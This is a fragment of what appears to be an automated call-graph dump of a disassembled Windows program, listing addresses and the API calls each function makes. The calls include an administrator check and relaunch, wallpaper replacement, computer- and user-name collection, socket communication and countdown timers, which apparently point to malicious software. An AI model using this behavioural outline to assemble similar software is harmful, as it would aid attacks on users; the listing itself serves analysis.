403035 ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 5902->5907 5908 402f85 5903->5908 5904->5903 5905 402fc0 ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5905->5893 5906->5902 5909 402ff5 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 5906->5909 5907->5893 5908->5905 5910 402fa1 ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 5908->5910 5911 403006 5909->5911 5910->5905 5912 402fb7 ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI 5910->5912 5911->5893 5912->5905 5914 404770 3 API calls 5913->5914 5915 401fac 5914->5915 5916 404770 3 API calls 5915->5916 5917 401fb4 5916->5917 5917->5917 5919 401fe3 5917->5919 5920 401fd0 GlobalFree 5917->5920 5918 40200c 5918->5706 5919->5918 5921 401ff9 GlobalFree 5919->5921 5920->5919 5921->5918 5922->5708 5923->5710 6075 403560 6076 40358c #4376 6075->6076 6077 40356e GetExitCodeThread 6075->6077 6078 403593 6076->6078 6077->6076 6077->6078 6413 409f60 RectVisible 5924 404070 #693 5925 404088 5924->5925 5926 40407f #825 5924->5926 5926->5925 5927 40a070 DrawTextA 6080 408d70 6081 408e09 GetDeviceCaps 6080->6081 6083 408eb0 6081->6083 6089 408ed8 6081->6089 6084 408eba GetDeviceCaps GetDeviceCaps 6083->6084 6083->6089 6084->6089 6085 4090b6 #2414 6086 408f51 _ftol _ftol 6086->6089 6087 408fca _ftol _ftol _ftol 6088 409024 CreateSolidBrush #1641 6087->6088 6087->6089 6088->6089 6089->6085 6089->6086 6089->6087 6090 409048 FillRect #2414 6089->6090 6091 409083 #2754 6089->6091 6090->6089 6091->6089 6192 404670 6197 404690 DeleteCriticalSection 6192->6197 6194 404678 6195 404688 6194->6195 6196 40467f #825 6194->6196 6196->6195 6197->6194 6414 409b70 #2379 6421 403f70 6426 403f90 #2414 6421->6426 6423 403f78 6424 403f88 6423->6424 6425 403f7f #825 6423->6425 6425->6424 6426->6423 6427 404f70 #4476 6428 404f91 6427->6428 6429 404fc7 #3089 6427->6429 6428->6429 6430 404f9b 6428->6430 6198 403271 #2302 #2302 5083 401600 5084 4016e5 5083->5084 5085 40161a 5083->5085 5086 4016e9 #537 5084->5086 5096 4016de 5084->5096 5087 40161d 5085->5087 5088 40168f 5085->5088 5106 401970 #3092 #6199 #800 5086->5106 5090 401743 #2385 5087->5090 5093 401628 #537 5087->5093 5094 40165e 5087->5094 5091 401693 #537 5088->5091 5088->5096 5105 401970 #3092 #6199 #800 5091->5105 5092 401701 SendMessageA #2385 5103 401970 #3092 #6199 #800 5093->5103 5094->5096 5098 401663 #537 5094->5098 5096->5090 5104 401970 #3092 #6199 #800 5098->5104 5099 4016ab SendMessageA #2385 5100 401640 #2385 5102 40167b #2385 5103->5100 5104->5102 5105->5099 5106->5092 6199 406a00 #4476 6200 406a23 6199->6200 6204 406a62 6199->6204 6201 406a38 #3089 6200->6201 6200->6204 6202 406a46 #3089 6201->6202 6201->6204 6203 406a54 #3089 6202->6203 6202->6204 6203->6204 6431 403f00 6436 403f20 #2414 6431->6436 6433 403f08 6434 403f18 6433->6434 6435 403f0f #825 6433->6435 6435->6434 6436->6433 5108 413102 __set_app_type __p__fmode __p__commode 5109 413171 5108->5109 5110 413185 5109->5110 5111 413179 __setusermatherr 5109->5111 5120 4133b2 _controlfp 5110->5120 5111->5110 5113 41318a _initterm __getmainargs _initterm 5114 4131de GetStartupInfoA 5113->5114 5116 413212 GetModuleHandleA 5114->5116 5121 4133e6 #1576 5116->5121 5119 413236 exit _XcptFilter 5120->5113 5121->5119 5928 403810 WideCharToMultiByte 5931 403e60 SendMessageA #3998 SendMessageA 5928->5931 5930 403845 5931->5930 5932 403410 #4476 5933 403454 #3089 5932->5933 5934 403431 5932->5934 5935 40343b 5933->5935 5934->5933 5934->5935 5936 404410 SetCursor 6092 401110 #2302 6437 404310 6438 404333 6437->6438 6439 40433a #470 #5789 #5875 #6172 6437->6439 6440 4044c0 7 API calls 6438->6440 6441 40438a #5789 #755 6439->6441 6440->6439 6442 401f10 6443 401f30 6 API calls 6442->6443 6444 401f18 6443->6444 6445 401f28 6444->6445 6446 401f1f #825 6444->6446 6446->6445 6211 40ca19 6212 40ca26 6211->6212 6213 40ca28 #823 6211->6213 6212->6213 6224 409a20 6229 4099c0 6224->6229 6227 409a38 6228 409a2f #825 6228->6227 6230 409a03 6229->6230 6231 4099f3 #6170 6229->6231 6230->6227 6230->6228 6231->6230 5937 40a020 TabbedTextOutA 5938 409c20 #3797 5939 409c40 #6734 5938->5939 5940 409c36 5938->5940 5941 409c5b SendMessageA 5939->5941 5942 409c78 5939->5942 5941->5942 5943 409ce4 5942->5943 5944 409caa 5942->5944 5945 409ce8 InvalidateRect 5943->5945 5948 409cf6 5943->5948 5946 409cd4 #4284 5944->5946 5947 409cc4 #4284 5944->5947 5945->5948 5946->5948 5947->5948 6451 409b20 6452 409b31 6451->6452 6453 409b33 #6140 6451->6453 6452->6453 6093 409920 6098 4098c0 6093->6098 6096 409938 6097 40992f #825 6097->6096 6099 4098f2 #5875 6098->6099 6100 4098fb 6098->6100 6099->6100 6100->6096 6100->6097 5949 408c20 5954 408b40 5949->5954 5951 408c28 5952 408c38 5951->5952 5953 408c2f #825 5951->5953 5953->5952 5955 408bd0 5954->5955 5956 408b78 BitBlt 5954->5956 5958 408bd6 #2414 #640 5955->5958 5959 408bc1 #5785 5956->5959 5960 408bb5 #5785 5956->5960 5958->5951 5959->5958 5960->5958 5589 401220 5590 4012c2 #2379 5589->5590 5591 401233 5589->5591 5592 401243 SendMessageA KillTimer #4853 5591->5592 5593 40126b SendMessageA 5591->5593 5592->5593 5594 401285 SendMessageA 5593->5594 5595 401297 5593->5595 5594->5595 5595->5590 5596 4012a1 SendMessageA 5595->5596 5596->5590 5597 4012b8 5596->5597 5597->5590 6214 405a20 6215 405a25 6214->6215 6218 4130bb 6215->6218 6221 41308f 6218->6221 6220 405a4a 6222 4130a4 __dllonexit 6221->6222 6223 413098 _onexit 6221->6223 6222->6220 6223->6220 6232 404620 #795 6233 404638 6232->6233 6234 40462f #825 6232->6234 6234->6233 5961 413427 5962 41342c 5961->5962 5965 4133fe #1168 5962->5965 5966 413421 5965->5966 5967 413418 _setmbcp 5965->5967 5967->5966 5971 407c30 OpenClipboard 5972 407c42 GlobalAlloc 5971->5972 5973 407ca9 5971->5973 5974 407c64 EmptyClipboard GlobalLock GlobalUnlock SetClipboardData CloseClipboard 5972->5974 5975 407c5b CloseClipboard 5972->5975 5974->5973 5968 40d830 inet_addr 5969 40d844 gethostbyname 5968->5969 5970 40d84f 5968->5970 5969->5970 5976 404430 5977 40447b 5976->5977 5978 40443d _TrackMouseEvent #2379 5976->5978 5981 404489 5977->5981 5983 404530 5977->5983 5982 4044a1 SetCursor #2379 5981->5982 5984 4045c1 5983->5984 5985 404552 5983->5985 5984->5981 5985->5984 5986 404559 #289 #5789 GetTextExtentPoint32A #5789 #613 5985->5986 5986->5984 6105 406930 #6215 6106 402d30 6107 402d73 #825 6106->6107 6108 402d3f 6106->6108 6109 402d40 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N #825 6108->6109 6109->6109 6110 402d72 6109->6110 6110->6107 6235 405230 6242 405369 6235->6242 6245 40525a 6235->6245 6236 405552 InvalidateRect 6241 405560 6236->6241 6237 405285 6238 4052ee 7 API calls 6237->6238 6239 40528f #4277 #923 #858 #800 #800 6237->6239 6238->6236 6239->6236 6240 40539e 6243 405430 6240->6243 6244 4053aa 7 API calls 6240->6244 6242->6236 6242->6240 6249 405390 #940 6242->6249 6246 4054b4 6243->6246 6247 405435 7 API calls 6243->6247 6244->6236 6245->6237 6248 405277 #940 6245->6248 6250 4054b8 6246->6250 6252 405503 6246->6252 6247->6236 6248->6237 6248->6248 6249->6240 6249->6249 6250->6236 6251 4054de #6778 #6648 6250->6251 6251->6251 6253 405501 6251->6253 6252->6236 6252->6241 6254 405529 #6778 #6648 6252->6254 6253->6236 6254->6236 6254->6254 6255 40d630 6260 40d650 6255->6260 6257 40d638 6258 40d648 6257->6258 6259 40d63f #825 6257->6259 6259->6258 6261 40dad0 4 API calls 6260->6261 6262 40d680 6261->6262 6262->6257 6111 402531 6112 402543 6111->6112 6113 40253c CloseHandle 6111->6113 6114 402555 6112->6114 6115 40254e CloseHandle 6112->6115 6113->6112 6115->6114 6263 40ca3a 6266 40ca40 6263->6266 6264 40ca81 6265 40ca87 #825 6265->6264 6266->6264 6266->6265 5987 4068c0 #4837 6267 4032c0 6 API calls 6268 403334 SendMessageA #3092 6267->6268 6270 40335c SendMessageA #3092 6268->6270 6272 40337b SendMessageA #3092 6270->6272 6274 4033a0 SendMessageA 6272->6274 6275 40339d 6272->6275 6278 403cb0 FindFirstFileA 6274->6278 6275->6274 6277 4033b2 SendMessageA #3996 SendMessageA 6279 403cd9 6278->6279 6280 403ce3 6278->6280 6279->6277 6281 403e1f FindNextFileA 6280->6281 6283 403d14 sscanf 6280->6283 6281->6280 6282 403e3a FindClose 6281->6282 6282->6277 6283->6281 6284 403d38 fopen 6283->6284 6284->6281 6285 403d5c fread 6284->6285 6286 403e15 fclose 6285->6286 6290 403d7b 6285->6290 6286->6281 6287 403d8f sprintf 6288 403dd4 SendMessageA #823 SendMessageA 6287->6288 6288->6286 6290->6286 6290->6287 6290->6288 6291 401c30 inet_ntoa 6290->6291 6291->6290 6454 4043c0 #6453 #2414 6455 409fc0 TextOutA 5122 4064d0 #4710 SendMessageA SendMessageA 5165 401c70 wcscat 5122->5165 5124 406516 5125 406577 5124->5125 5126 40651d GetModuleFileNameA strrchr 5124->5126 5174 401a10 5125->5174 5127 40656c SetCurrentDirectoryA 5126->5127 5128 40655d strrchr 5126->5128 5127->5125 5128->5127 5130 406585 5131 4065e5 5130->5131 5132 40658c time 5130->5132 5184 402c40 5131->5184 5133 401a10 5 API calls 5132->5133 5133->5131 5135 4065ed __p___argc 5136 406606 5135->5136 5137 40678c 5136->5137 5138 40660f __p___argv 5136->5138 5190 407e80 SHGetFolderPathW wcslen 5137->5190 5140 406621 5138->5140 5143 406661 __p___argv 5140->5143 5144 406652 5140->5144 5141 406793 SetWindowTextW 5193 406f80 5141->5193 5147 40666d 5143->5147 5260 407f80 fopen 5144->5260 5145 4067a9 5251 406c20 GetUserDefaultLangID GetLocaleInfoA 5145->5251 5151 4066ad __p___argv 5147->5151 5152 40669e 5147->5152 5150 4067b0 SetTimer SetTimer 5154 4066b9 5151->5154 5270 4080c0 FindFirstFileA 5152->5270 5154->5137 5156 4066ee Sleep 5154->5156 5288 401bb0 AllocateAndInitializeSid 5156->5288 5158 406734 5159 406750 sprintf 5158->5159 5160 406738 5158->5160 5294 401a90 CreateProcessA 5159->5294 5293 401b50 ShellExecuteExA 5160->5293 5163 40674b ExitProcess 5166 401cdc 5165->5166 5167 401d00 RegCreateKeyW 5166->5167 5168 401d62 RegQueryValueExA 5166->5168 5169 401d1d GetCurrentDirectoryA RegSetValueExA 5166->5169 5170 401dbb 5166->5170 5167->5166 5171 401d9e RegCloseKey 5168->5171 5172 401d90 SetCurrentDirectoryA 5168->5172 5169->5171 5170->5124 5171->5166 5173 401dc8 5171->5173 5172->5171 5173->5124 5175 401a1a fopen 5174->5175 5177 401a3a 5175->5177 5178 401a6f 5175->5178 5179 401a53 fwrite 5177->5179 5180 401a46 fread 5177->5180 5178->5130 5181 401a5e 5179->5181 5180->5181 5182 401a74 fclose 5181->5182 5183 401a66 fclose 5181->5183 5182->5130 5183->5178 5302 404b70 5184->5302 5186 402c46 5187 402c57 5186->5187 5188 402c5e LoadLibraryA 5186->5188 5187->5135 5188->5187 5189 402c73 7 API calls 5188->5189 5189->5187 5191 407f02 5190->5191 5192 407f09 swprintf MultiByteToWideChar CopyFileW SystemParametersInfoW 5190->5192 5191->5141 5192->5141 5307 4076a0 5193->5307 5195 406fa8 27 API calls 5196 407119 5195->5196 5197 40711c SendMessageA #3092 5195->5197 5196->5197 5198 40713d SendMessageA #3092 5197->5198 5200 40715f SendMessageA #3092 5198->5200 5202 407181 SendMessageA #3092 5200->5202 5204 4071a3 SendMessageA #3092 5202->5204 5206 4071c5 SendMessageA #3092 5204->5206 5208 4071e7 5206->5208 5209 4071ea SendMessageA #3092 5206->5209 5208->5209 5210 407205 SendMessageA #3092 5209->5210 5212 407227 SendMessageA #3092 5210->5212 5214 407249 SendMessageA #3092 5212->5214 5216 40726b 5214->5216 5217 40726e SendMessageA #860 5214->5217 5216->5217 5218 4072a4 5217->5218 5219 4072ed #537 5218->5219 5323 404210 #858 #800 5219->5323 5221 407309 #537 5324 404210 #858 #800 5221->5324 5223 407325 #540 #2818 #535 5325 404210 #858 #800 5223->5325 5225 407369 5326 404270 5225->5326 5229 4073a8 SendMessageA SendMessageA #6140 #6140 5230 407428 5229->5230 5330 405920 5230->5330 5234 407457 5338 4058c0 5234->5338 5236 407460 5341 405180 _mbscmp 5236->5341 5238 407477 5239 405920 2 API calls 5238->5239 5240 4074ac 5239->5240 5241 405860 2 API calls 5240->5241 5242 4074b5 5241->5242 5243 4058c0 2 API calls 5242->5243 5244 4074be 5243->5244 5245 405180 4 API calls 5244->5245 5246 4074d5 GetTimeZoneInformation 5245->5246 5347 401e60 VariantTimeToSystemTime 5246->5347 5248 407508 SystemTimeToTzSpecificLocalTime #2818 5348 401e60 VariantTimeToSystemTime 5248->5348 5250 40759b SystemTimeToTzSpecificLocalTime #2818 #6334 #800 5250->5145 5252 406c81 SendMessageA 5251->5252 5253 406c5d 5251->5253 5254 406cc1 SendMessageA 5252->5254 5255 406ca1 SendMessageA 5252->5255 5253->5252 5355 406ae0 8 API calls 5254->5355 5256 406ae0 27 API calls 5255->5256 5258 406cba 5256->5258 5258->5150 5259 406cdd 5259->5150 5261 407fd0 fread fclose 5260->5261 5262 406659 ExitProcess 5260->5262 5374 40be90 strncpy strncpy strncpy 5261->5374 5264 408002 5375 40c4f0 5264->5375 5266 40801d 5267 40c4f0 112 API calls 5266->5267 5268 408041 5266->5268 5267->5268 5268->5262 5269 401a10 5 API calls 5268->5269 5269->5262 5271 408124 5270->5271 5272 40820a 5270->5272 5275 4081e4 FindNextFileA 5271->5275 5278 408158 sscanf 5271->5278 5284 4081bd fclose 5271->5284 5389 401e30 5272->5389 5275->5271 5276 4081ff FindClose 5275->5276 5276->5272 5277 401e30 2 API calls 5279 408255 sprintf #537 5277->5279 5278->5275 5280 408178 fopen 5278->5280 5394 4082c0 5279->5394 5280->5275 5282 408190 fread 5280->5282 5282->5271 5282->5284 5284->5271 5284->5275 5285 408291 #537 5287 4082c0 141 API calls 5285->5287 5286 4066a5 ExitProcess 5287->5286 5289 401bf6 5288->5289 5290 401bfb CheckTokenMembership 5288->5290 5289->5158 5291 401c10 5290->5291 5292 401c14 FreeSid 5290->5292 5291->5292 5292->5158 5293->5163 5295 401b45 5294->5295 5296 401aed 5294->5296 5295->5163 5297 401af5 WaitForSingleObject 5296->5297 5298 401b26 CloseHandle CloseHandle 5296->5298 5299 401b12 5297->5299 5300 401b05 TerminateProcess 5297->5300 5298->5163 5299->5298 5301 401b1a GetExitCodeProcess 5299->5301 5300->5299 5301->5298 5303 404b81 LoadLibraryA 5302->5303 5304 404b7a 5302->5304 5305 404b96 6 API calls 5303->5305 5306 404bf6 5303->5306 5304->5186 5305->5306 5306->5186 5308 4076d9 time 5307->5308 5310 4076d7 5308->5310 5309 407771 sprintf 5309->5310 5310->5308 5310->5309 5311 405180 4 API calls 5310->5311 5312 407842 SendMessageA SendMessageA #540 5310->5312 5311->5310 5313 407894 5312->5313 5314 4078aa _ftol #2818 #2818 5313->5314 5315 4078db #2818 #2818 5313->5315 5316 407911 #3092 #6199 5314->5316 5315->5316 5317 407990 #800 5316->5317 5318 407940 5316->5318 5317->5195 5318->5317 5319 407952 InvalidateRect 5318->5319 5320 405920 2 API calls 5319->5320 5321 407978 5320->5321 5322 405920 2 API calls 5321->5322 5322->5317 5323->5221 5324->5223 5325->5225 5349 4044c0 5326->5349 5329 404210 #858 #800 5329->5229 5353 405950 InvalidateRect 5330->5353 5332 40592d 5354 405970 InvalidateRect 5332->5354 5334 40593e 5335 405860 5334->5335 5336 405872 5335->5336 5337 405875 GetClientRect #6197 5335->5337 5336->5337 5337->5234 5339 4058d2 5338->5339 5340 4058d5 GetClientRect #6197 5338->5340 5339->5340 5340->5236 5342 4051f8 5341->5342 5343 40519e #860 5341->5343 5342->5238 5344 4051b1 5343->5344 5345 4051d1 RedrawWindow 5344->5345 5346 4051ea InvalidateRect 5344->5346 5345->5238 5346->5342 5347->5248 5348->5250 5350 4044f8 GetObjectA CreateFontIndirectA #1641 5349->5350 5351 4044ce GetParent #2864 SendMessageA #2860 5349->5351 5352 40427a #2818 #535 5350->5352 5351->5350 5351->5352 5352->5329 5353->5332 5354->5334 5356 406b88 #537 #924 sprintf #800 #800 5355->5356 5357 406bda 5355->5357 5356->5357 5360 406cf0 5357->5360 5359 406be6 #800 5359->5259 5361 406d16 5360->5361 5362 406d19 SendMessageA #353 SendMessageA #1979 5360->5362 5361->5362 5365 406dc0 SendMessageA #823 5362->5365 5366 406e00 SendMessageA 5365->5366 5367 406d7b #665 5365->5367 5369 406ed2 #825 5366->5369 5370 406e2f _strnicmp 5366->5370 5367->5359 5369->5367 5371 406e4b _strnicmp 5370->5371 5372 406e67 5370->5372 5371->5372 5372->5369 5372->5370 5373 406e87 SendMessageA #6136 5372->5373 5373->5372 5374->5264 5376 40c50f 5375->5376 5377 40bed0 110 API calls 5376->5377 5378 40c54b 5377->5378 5379 40c596 5378->5379 5380 40dd00 4 API calls 5378->5380 5381 40dbf0 free 5379->5381 5383 40c568 5380->5383 5382 40c5e7 5381->5382 5382->5266 5383->5379 5384 40c600 5383->5384 5385 40c635 5384->5385 5386 40c617 strncpy 5384->5386 5387 40dbf0 free 5385->5387 5386->5385 5388 40c650 5387->5388 5388->5266 5421 401e60 VariantTimeToSystemTime 5389->5421 5391 401e42 5422 401de0 sprintf 5391->5422 5393 401e51 5393->5277 5395 408337 5394->5395 5396 4082fb #4278 #858 #800 5394->5396 5397 408344 5395->5397 5398 408378 time 5395->5398 5396->5395 5399 408359 #800 5397->5399 5400 40834d #1200 5397->5400 5401 40839c 5398->5401 5402 40844d time 5398->5402 5403 40828c 5399->5403 5400->5399 5401->5402 5404 4083a9 5401->5404 5402->5404 5405 408466 5402->5405 5403->5285 5403->5286 5406 4083bb 5404->5406 5407 40846c fopen 5404->5407 5405->5407 5408 4083c4 #540 time #2818 #1200 #800 5406->5408 5409 40842e #800 5406->5409 5410 4084b5 fread fclose 5407->5410 5411 408496 #800 5407->5411 5408->5409 5409->5403 5423 40be90 strncpy strncpy strncpy 5410->5423 5411->5403 5413 4084e7 5424 40c060 5413->5424 5415 408501 5416 408516 5415->5416 5417 408538 5415->5417 5418 408549 #800 5416->5418 5419 40851a #1200 time 5416->5419 5417->5418 5420 40853c #1200 5417->5420 5418->5403 5419->5418 5420->5418 5421->5391 5422->5393 5423->5413 5425 40c07f 5424->5425 5426 40bed0 110 API calls 5425->5426 5427 40c0ba 5426->5427 5428 40c0c1 5427->5428 5429 40c0e7 5427->5429 5430 40c0cc SendMessageA 5428->5430 5448 40c0db 5428->5448 5431 40c104 5429->5431 5432 40c0f8 SendMessageA 5429->5432 5430->5448 5433 40dd00 4 API calls 5431->5433 5432->5431 5436 40c116 5433->5436 5434 40dbf0 free 5435 40c173 5434->5435 5435->5415 5437 40c144 5436->5437 5438 40c17b 5436->5438 5439 40c154 5437->5439 5440 40c148 SendMessageA 5437->5440 5441 40c18b 5438->5441 5442 40c17f SendMessageA 5438->5442 5443 40dbf0 free 5439->5443 5440->5439 5444 40c1b4 5441->5444 5445 40c1e8 5441->5445 5442->5441 5443->5435 5446 40c1c4 5444->5446 5447 40c1b8 SendMessageA 5444->5447 5445->5448 5449 40c1f5 SendMessageA 5445->5449 5450 40dbf0 free 5446->5450 5447->5446 5448->5434 5449->5448 5450->5435 6117 4059d0 #561 5451 40dad0 5452 40db33 5451->5452 5453 40dadf setsockopt send shutdown closesocket 5451->5453 5453->5452 6456 40dbd0 6457 40dbf0 free 6456->6457 6458 40dbd8 6457->6458 6459 40dbe8 6458->6459 6460 40dbdf #825 6458->6460 6460->6459 5454 40bed0 5455 40bef5 5454->5455 5456 40bf0a #823 5454->5456 5455->5456 5457 40bf2e 5456->5457 5458 40bf27 5456->5458 5460 40bf46 5457->5460 5461 40baf0 99 API calls 5457->5461 5459 40d5e0 4 API calls 5458->5459 5459->5457 5462 40bf6b 5461->5462 5463 40bf72 5462->5463 5464 40bf8a GetComputerNameA GetUserNameA 5462->5464 5465 40dc00 4 API calls 5464->5465 5466 40c013 5465->5466 5467 40dd00 4 API calls 5466->5467 5468 40c01f 5467->5468 5469 40dc00 4 API calls 5468->5469 5470 40c038 5469->5470 5471 40dd00 4 API calls 5470->5471 5472 40c047 5471->5472 5988 404cd0 5993 404cf0 #2414 #2414 #800 #641 5988->5993 5990 404cd8 5991 404ce8 5990->5991 5992 404cdf #825 5990->5992 5992->5991 5993->5990 6116 4019d0 EnableWindow 6118 404dd0 6 API calls 6119 404e3b SendMessageA #3092 6118->6119 6121 404e60 SendMessageA #3092 6119->6121 6123 404e93 SendMessageA 6121->6123 6124 404e7f SendMessageA 6121->6124 6292 4102d0 free 5994 4130d4 ??1type_info@@UAE 5995 4130e3 #825 5994->5995 5996 4130ea 5994->5996 5995->5996 5483 4068e0 5484 4068ef 5483->5484 5485 40691a #5280 5484->5485 5486 4068fc 5484->5486 5620 4043e0 #4284 #3874 #5277 5997 40a0e0 Escape 6293 4086e0 #470 GetClientRect SendMessageA #6734 #323 6294 408765 6293->6294 6295 408838 6294->6295 6298 4087bd CreateCompatibleDC #1640 6294->6298 6296 408885 #2754 6295->6296 6297 408869 FillRect 6295->6297 6299 408897 #2381 6296->6299 6297->6299 6325 409e70 CreateCompatibleBitmap #1641 6298->6325 6302 4088b4 6299->6302 6303 408a7d 6299->6303 6302->6303 6305 4088be #3797 6302->6305 6307 409f80 BitBlt 6303->6307 6321 408a5e 6303->6321 6304 408809 6326 409f10 6304->6326 6308 408901 _ftol 6305->6308 6310 408abe 6307->6310 6315 40895e _ftol 6308->6315 6317 40897e 6308->6317 6309 408817 #6194 6309->6295 6312 408ad5 #5785 6310->6312 6313 408ac6 #5785 6310->6313 6312->6321 6313->6321 6315->6317 6316 408afe #640 #755 6318 4089a7 FillRect 6317->6318 6319 4089b8 FillRect 6317->6319 6320 4089ca 6317->6320 6318->6320 6319->6320 6320->6321 6329 409f80 6320->6329 6332 409e20 #2414 6321->6332 6323 408a50 6324 409f10 2 API calls 6323->6324 6324->6321 6325->6304 6327 409f25 #5785 6326->6327 6328 409f18 #5785 6326->6328 6327->6309 6328->6309 6330 409f88 6329->6330 6331 409f8b BitBlt 6329->6331 6330->6331 6331->6323 6332->6316 6333 40c6e0 6334 40c722 #825 6333->6334 6335 40c6ef 6333->6335 6336 40c7b0 #825 6335->6336 6337 40c70d #825 6336->6337 6337->6335 6338 40c721 6337->6338 6338->6334 6474 40cfe0 6481 40d4c0 6474->6481 6476 40cffb 6477 40d4c0 4 API calls 6476->6477 6480 40d05e 6476->6480 6478 40d031 6477->6478 6479 40d4c0 4 API calls 6478->6479 6478->6480 6479->6480 6482 40d4d0 6481->6482 6483 40d4d9 6481->6483 6482->6476 6484 40d4e4 6483->6484 6485 40d4ee time 6483->6485 6484->6476 6486 40d575 6485->6486 6491 40d50a 6485->6491 6487 40d58a 6486->6487 6488 40d2b0 memmove 6486->6488 6487->6476 6488->6487 6489 40d569 time 6489->6486 6489->6491 6490 40d551 Sleep 6490->6491 6491->6486 6491->6489 6491->6490 6465 404fe0 #6334 6466 404ff4 #4853 6465->6466 6467 404ffb 6465->6467 6466->6467 6137 405df0 6142 405d90 #654 #765 6137->6142 6139 405df8 6140 405e08 6139->6140 6141 405dff #825 6139->6141 6141->6140 6142->6139 5998 4090f0 5999 409124 #540 #3874 5998->5999 6000 40971e 5998->6000 6001 409185 5999->6001 6002 40915e 5999->6002 6004 40919c _ftol 6001->6004 6005 40918e #860 6001->6005 6003 40917c 6002->6003 6006 40916e #860 6002->6006 6007 4091d5 SendMessageA #2860 6003->6007 6008 40970a #800 6003->6008 6004->6003 6005->6004 6006->6003 6009 409208 6007->6009 6008->6000 6024 409870 6009->6024 6011 409232 #5875 #6170 GetWindowOrgEx #540 #2818 6013 409329 GetObjectA 6011->6013 6014 40935b GetTextExtentPoint32A 6011->6014 6013->6014 6016 40938b GetViewportOrgEx 6014->6016 6020 409411 6016->6020 6017 409630 #800 6018 409662 6017->6018 6019 40965a #6170 6017->6019 6021 409685 #2414 #2414 6018->6021 6022 40967d #5875 6018->6022 6019->6018 6020->6017 6021->6008 6022->6021 6025 409880 #2414 6024->6025 6025->6011 6339 406ef0 6340 406f03 #823 6339->6340 6341 406f6a 6339->6341 6340->6341 6342 406f25 SendMessageA ShellExecuteA #825 6340->6342 6342->6341 6126 4019f0 #765 6127 401a08 6126->6127 6128 4019ff #825 6126->6128 6128->6127 6129 4011f0 6130 40120b #5280 6129->6130 6131 4011fd 6129->6131 6131->6130 6132 401203 6131->6132 6133 4059f0 6134 4059f8 6133->6134 6135 405a08 6134->6135 6136 4059ff #825 6134->6136 6136->6135 6492 4067f0 IsIconic 6493 406808 7 API calls 6492->6493 6494 40689a #2379 6492->6494 6495 409ff0 ExtTextOutA 6496 406380 6501 405e10 #2414 #2414 #2414 #2414 6496->6501 6498 406388 6499 406398 6498->6499 6500 40638f #825 6498->6500 6500->6499 6530 403f20 #2414 6501->6530 6503 405ed6 6531 403f20 #2414 6503->6531 6505 405eec 6532 403f20 #2414 6505->6532 6507 405f02 6533 403f20 #2414 6507->6533 6509 405f18 #2414 6534 403f20 #2414 6509->6534 6511 405f50 6535 403f20 #2414 6511->6535 6513 405f66 6536 403f20 #2414 6513->6536 6515 405f7c 6 API calls 6537 4050a0 #800 #795 6515->6537 6517 405ffe 6538 4050a0 #800 #795 6517->6538 6519 40600e 6539 404170 #2414 #800 #800 #795 6519->6539 6521 40601e 6540 404170 #2414 #800 #800 #795 6521->6540 6523 40602e 6541 404170 #2414 #800 #800 #795 6523->6541 6525 40603e 6542 404170 #2414 #800 #800 #795 6525->6542 6527 40604e #654 #765 6543 405d90 #654 #765 6527->6543 6529 406087 #609 #609 #616 #641 6529->6498 6530->6503 6531->6505 6532->6507 6533->6509 6534->6511 6535->6513 6536->6515 6537->6517 6538->6519 6539->6521 6540->6523 6541->6525 6542->6527 6543->6529 6027 40d880 6030 40d0a0 time srand rand 6027->6030 6029 40d88f 6031 40d0d3 rand 6030->6031 6032 40d0e1 6030->6032 6031->6031 6031->6032 6032->6029 5074 405580 GetClientRect 5075 4055c7 7 API calls 5074->5075 5076 4057c9 5074->5076 5077 405666 5075->5077 5078 405669 #5785 CreateSolidBrush FillRect 5075->5078 5077->5078 5079 405770 6 API calls 5078->5079 5082 4056b2 5078->5082 5079->5076 5081 4056cd BitBlt 5081->5082 5082->5079 5082->5081 5107 40db80 recv 6033 405080 6038 4050a0 #800 #795 6033->6038 6035 405088 6036 405098 6035->6036 6037 40508f #825 6035->6037 6037->6036 6038->6035 6344 404280 6345 404290 6344->6345 6346 40428b 6344->6346 6348 4042a0 #6663 6345->6348 6349 4042fd #2379 6345->6349 6347 404530 5 API calls 6346->6347 6347->6345 6350 4042b5 GetParent #2864 SendMessageA #2379 6348->6350 6351 4042e7 ShellExecuteA 6348->6351 6351->6349 6143 403180 6148 4031a0 #2414 #2414 #616 #693 #641 6143->6148 6145 403188 6146 403198 6145->6146 6147 40318f #825 6145->6147 6147->6146 6148->6145 6149 408580 #609 6150 408598 6149->6150 6151 40858f #825 6149->6151 6151->6150 6544 409b80 6545 409b99 6544->6545 6546 409ba5 #2379 6545->6546 6547 409b9d 6545->6547 5473 407a90 5474 407bf4 #2385 5473->5474 5475 407abd 5473->5475 5475->5474 5482 404c40 #324 #540 #860 5475->5482 5477 407ae2 #2514 5478 407b72 #2414 #2414 #800 #641 5477->5478 5479 407afb 6 API calls 5477->5479 5478->5474 5480 4082c0 141 API calls 5479->5480 5481 407b61 #800 5480->5481 5481->5478 5482->5477 6152 404d90 #2370 #2289 6039 401091 6044 4010c0 #765 #641 6039->6044 6041 4010a8 6042 4010b8 6041->6042 6043 4010af #825 6041->6043 6043->6042 6044->6041 6352 414290 #825 6059 40a0a0 6060 40a0a8 6059->6060 6061 40a0ab GrayStringA 6059->6061 6060->6061 6051 4098a0 6056 4097e0 6051->6056 6053 4098a8 6054 4098b8 6053->6054 6055 4098af #825 6053->6055 6055->6054 6057 409815 6056->6057 6058 40981e #2414 #2414 6056->6058 6057->6058 6058->6053 6359 40c6a0 6360 40c6b8 6359->6360 6361 40c6aa 6359->6361 6361->6360 6362 40c6be #825 6361->6362 6362->6360 6171 4085a0 #781 6172 4085b8 6171->6172 6173 4085af #825 6171->6173 6173->6172 5598 40d6a0 htons socket 5599 40d6f3 bind 5598->5599 5600 40d814 5598->5600 5601 40d717 ioctlsocket 5599->5601 5602 40d809 5599->5602 5601->5602 5603 40d732 connect select 5601->5603 5602->5600 5604 40d80d closesocket 5602->5604 5603->5602 5605 40d78b __WSAFDIsSet 5603->5605 5604->5600 5606 40d79a __WSAFDIsSet 5605->5606 5607 40d7ac ioctlsocket setsockopt setsockopt 5605->5607 5606->5602 5606->5607 5621 4063a0 15 API calls 6062 4034a0 6 